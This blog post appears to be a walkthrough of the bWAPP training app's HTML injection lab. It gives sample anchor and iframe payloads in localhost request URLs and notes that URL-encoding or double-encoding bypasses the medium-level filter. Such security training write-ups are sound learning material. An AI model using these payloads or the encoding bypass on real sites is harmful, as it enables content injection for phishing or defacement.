BWAPP HTML Injection (GET/POST)

Bwapp

Writeups

Publish Date: 2019-01-18

Update Date: 2021-06-10

Word Count: 200

Read Times: 1 Min

Read Count:

BWAPP A1 - Injection

localhost/bWAPP/htmli_get.php?firstname=%3Ca+href%3D%27https%3A%2F%2Fwww.mukhilan.com%2F%27%3Etest%3C%2Fa%3E&lastname=sdf&form=submit

Sample payload,

<a+href%3D'https://www.mukhilan.com/'+>test<%2Fa>

<iframe+src%3D"robots.txt"+height%3D"200"+width%3D"300"><%2Fiframe>

localhost/bWAPP/htmli_get.php?firstname=%253Ch2%253Efgh%253C%252Fh2%253E&lastname=df&form=submit

In this level, Encoding will bypass the validation.

<a href='mukhilan.com' >test</a>

Sample payload,

<iframe src="robots.txt"+height="200"+width="300"></iframe>

%3Ch2%3Edf%3C%2Fh2%3E

same as GET medium level , encoding will bypass this level.

https://www.owasp.org/index.php/Testing_for_HTML_Injection_(OTG-CLIENT-003)
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

Mukhilan

http://mukhilan.com/Writeups/bwapp-html/

All articles in this blog are used except for special statements CC BY 4.0 reprint polocy. If reproduced, please indicate source Mukhilan !

Bwapp

Comment

BWAPP HTML Injection Reflected URL/Stored Blog solution

2019-01-19 Writeups

Bwapp

BWAPP XML/XPath Injection Login Form and search solution

2019-01-18 Writeups

Bwapp